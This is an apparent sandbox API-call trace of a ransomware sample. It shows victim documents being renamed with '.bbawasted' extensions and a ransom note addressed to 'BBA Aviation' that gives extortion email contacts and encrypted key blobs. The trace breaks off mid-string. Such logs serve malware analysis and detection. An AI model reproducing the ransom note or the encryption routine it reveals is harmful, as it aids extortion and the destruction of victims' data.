0x689df0 [0218.240] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6b48) returned 1 [0218.240] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0218.240] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0218.241] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a62c8) returned 1 [0218.241] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0218.242] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0218.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0218.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0218.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0218.252] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]VupOnQPIePoR2uMuOejpvXPbAZPmfi4ZJ5Pvesete//hvWtI+pfKtxPzPgFMNLYS\r\nPQgecDY1Q3uVh/QpZ49eNvnU/7sVp1Bgn3Ln9c0xOPEsgNKrNsIrWciKmRogPxEy\r\nqs6QCRHAovT08nATl++iCfPBuOyuYtFa/ggFsLwnBNyt+eaV0saPO+uESF/zRuOT\r\nYC7WsAHx0YmmICmSQ3ylylHGe898lnJqFow//lMKTjuqYhAmhjZoGTeCrqMQ14Kd\r\nfsitDqCGwxqWmf//NVdGLIBp8xOX3Ci3fxMchZj2dsalOiv80BCE4scoZ7ZL4lVB\r\nO2wsMHzQEoMXt8W4vP211J7FxLNogLLLeVHZs5xg4BwKULDopb7WtUgqoGia9r3n\r\nIZjXgHTgFn24Vq29YrJDyK/Uf1LQUL8HaPLmit+TUFm3VXcd3HDIa7kwwp9f0sS/\r\nYu7MLi6I33TeH6+/WYsCpvNfe5ViFHeljV83J0lh0H1SIKNU6T4mu7R/1122kj2G\r\njn4BICoYbWuDGsFhYLY5ZjUqrRy3fcgos+hZw5UHYBH2Q29osFu0Bp85OK0pacBE\r\nOm8zRftMoja+2klRzJR5/I8s7nYGNXYK+DJXdzAHHnttlrEzhaZ5ND+Z5oSnFvEp\r\nTSv2iwlE8K65q6GEKrydQA1F5SCzYkGpYpQ8bUiy6Ya=[end_key]\r\nKEEP IT\r\n") returned 984 [0218.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0218.252] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0218.253] SetEndOfFile (hFile=0x28c) returned 1 [0218.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0218.255] CloseHandle (hObject=0x28c) returned 1 [0218.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a21e0 | out: hHeap=0x660000) returned 1 [0218.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b2470 | out: hHeap=0x660000) returned 1 [0218.255] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a64e8) returned 1 [0218.256] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0218.256] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0218.256] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\_4k2ppmNT4Az.rtf") returned 51 [0218.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x270) returned 0x6a1a48 [0218.256] lstrcpyW (in: lpString1=0x6a1aae, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0218.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0218.257] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6928) returned 1 [0218.257] CryptGenRandom (in: hProv=0x6a6928, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0218.257] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0218.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\_4k2ppmNT4Az.rtf.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\_4k2ppmnt4az.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0218.258] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0218.260] SetEndOfFile (hFile=0x28c) returned 1 [0218.260] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0218.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0218.260] lstrcpyW (in: lpString1=0x6a1aae, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0218.260] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\_4k2ppmNT4Az.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\_4k2ppmnt4az.rtf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\_4k2ppmNT4Az.rtf.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\_4k2ppmnt4az.rtf.bbawasted")) returned 1 [0218.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\_4k2ppmNT4Az.rtf.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\_4k2ppmnt4az.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0218.261] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0218.262] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xf6ae [0218.262] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf6ae) returned 0x5f0000 [0218.262] CloseHandle (hObject=0x27c) returned 1 [0218.264] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0218.265] CloseHandle (hObject=0x280) returned 1 [0218.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0218.265] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a64e8) returned 1 [0218.266] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0218.266] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0218.266] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6130) returned 1 [0218.267] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0218.267] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0218.668] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0218.668] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0218.668] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0218.668] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]WsSGpkXosuVtrbHIeEJAWvduGiH08GecQImemnxzdwNHYVtI8RJg7kxCOMc120qO\r\njQDgPpkzww5TR+4IOqd19KrCIiMwmbP4w3xTLq5P/42QTf2eLu56YjDfFQKHBKQk\r\nZFoVS/O7G4LG9XxaWrY0C/T1uU/o7X6ChuWDtwgebZJXVoOWvpzb86YgJevbbl8F\r\noW+y9s6YtqO7qcIFwuwQn4TyG9gmuY0VOvYVNultrfcFXrFCD9MRYj2h23DVfIBL\r\nCPO66AbrH5lKkxyVLb0bxG2Q6O4m4El2bYYLnfXGOyP8z/UFvrcXKy8cTW5bN7zT\r\nth+JiuwZPsD+Vvd11paglCRN95fiuPQdGaCi1ChmQT06HrB1IVkje7pAwYrcRpB+\r\nUYCVxcAWqaRJiwo71pDTaq40xRrumWbav0IQKVjMXmKVU4NJpU830uZok/xvXqda\r\niR6tcB/Ub0Sb0EpGHdAkjahmfzRLHXGBrJ1Ppxf0yzMEvSmmxUxiz10m6jey8Tgg\r\nSOPSccCVa6UhdO+bQ4vvj8ePZ6DYt30JqJ6zCt3sEv/2KNrjON8V2rgpY+atHoui\r\niFnNl/gU1NEcOLGZ6JjeHTGvUA5M4q5dueyo5/BLxLRmGap+ayysGSM0CVPQXdQm\r\nNGD7EQHTWULUuS8gnCjX0crHfame7UyfSUebJfnyDP3=[end_key]\r\nKEEP IT\r\n") returned 984 [0218.668] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0218.668] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0218.668] SetEndOfFile (hFile=0x28c) returned 1 [0218.671] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0218.671] CloseHandle (hObject=0x28c) returned 1 [0218.671] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1a48 | out: hHeap=0x660000) returned 1 [0218.671] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b28f0 | out: hHeap=0x660000) returned 1 [0218.672] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6790) returned 1 [0218.672] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0218.672] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0218.672] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Sdk77j.pptx") returned 41 [0218.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x6adb18 [0218.672] lstrcpyW (in: lpString1=0x6adb6a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0218.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0218.672] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5f10) returned 1 [0218.673] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0218.673] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0218.673] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Sdk77j.pptx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\sdk77j.pptx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0218.674] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0218.675] SetEndOfFile (hFile=0x28c) returned 1 [0218.675] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0218.675] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0218.675] lstrcpyW (in: lpString1=0x6adb6a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0218.675] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Sdk77j.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\sdk77j.pptx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Sdk77j.pptx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\sdk77j.pptx.bbawasted")) returned 1 [0218.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Sdk77j.pptx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\sdk77j.pptx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0218.676] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0218.677] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x78a2 [0218.677] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x78a2) returned 0x5f0000 [0218.677] CloseHandle (hObject=0x27c) returned 1 [0218.678] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0218.679] CloseHandle (hObject=0x294) returned 1 [0218.679] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0218.679] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a60a8) returned 1 [0218.680] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0218.680] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0218.680] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6350) returned 1 [0218.680] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0218.680] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0218.689] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0218.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0218.689] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0218.689] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ZtviTKJeN6gWQSBvXu/TEjozWfjvdF8EWcz/iK8hG4CHcXadkz51A9sZgXjw0FK+\r\nZjT697b+o0ybMV2DDG2gWc6/VER38Tq3AxeP5zPoujKVOJkTOGXfR8q/A+08LoDc\r\nTNKPWdkZkZ9bd+S58JzIYxrwWBoxPoI3JfydlmnHfg4ZDnse3Oqz5tdZwxDXMGT/\r\n7imXtD8j101uVfYL6RzcHysPTcQjDapCDSfe2XXz22GG/eYmGamMp26cn+0yenzq\r\n9ywKNEqtw+k50F0nxd8igrlVv+I9WAuPMQBoYt/MUDEL30XRUI8A/BoEdHOuK3fT\r\nBBSiC6BhX3QHT7IdbQZkDTq4TBiYP/IvE1j8JZW9V/QmQwyQIdS53WyfYUBIxSfy\r\n9ME1iP2boKeGGKL27wr0ibv8F6YBICfmL5pcwiYCZZ9LdrBiiVR/bN6I23jbM9Du\r\nS2I1QwWEVtKPcwFow+04H1ZfbkN9yFBzrcmC2HHD/JfuDgY1E8fPgxfFwLL+RP4g\r\nAjKrVTWv6GpXW1l+v8VGalD6hC2APLkuz86i4hBRQ96geXloMRc9z7kGh59/u/1c\r\nnNauo/MNsn26I8Xj2JlLg5+0fcnW8BkYtC0ediElRMMGjwaAtV1qOBf+iFnG8zHs\r\n2K7nFLSFoW3YJOdLSaCFluMYGsrDC0GBYo9AJ1TI6FX=[end_key]\r\nKEEP IT\r\n") returned 984 [0218.689] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0218.689] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0218.690] SetEndOfFile (hFile=0x28c) returned 1 [0218.692] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0218.692] CloseHandle (hObject=0x28c) returned 1 [0218.692] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0218.692] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5328 | out: hHeap=0x660000) returned 1 [0218.692] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a62c8) returned 1 [0218.693] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0218.693] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0218.693] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\tNCGt.pptx") returned 40 [0218.693] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25a) returned 0x6adb18 [0218.693] lstrcpyW (in: lpString1=0x6adb68, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0218.693] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0218.693] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a62c8) returned 1 [0218.694] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0218.694] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0218.694] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\tNCGt.pptx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\tncgt.pptx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0218.767] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0218.768] SetEndOfFile (hFile=0x28c) returned 1 [0218.768] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0218.768] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0218.768] lstrcpyW (in: lpString1=0x6adb68, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0218.768] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\tNCGt.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\tncgt.pptx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\tNCGt.pptx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\tncgt.pptx.bbawasted")) returned 1 [0218.770] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\tNCGt.pptx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\tncgt.pptx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0218.770] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0218.770] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xa473 [0218.770] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa473) returned 0x5f0000 [0218.771] CloseHandle (hObject=0x294) returned 1 [0218.772] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0218.774] CloseHandle (hObject=0x27c) returned 1 [0218.774] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0218.774] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a65f8) returned 1 [0218.774] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0218.774] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0218.775] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6240) returned 1 [0218.775] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0218.775] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0218.787] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0218.787] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0218.787] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0218.787] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 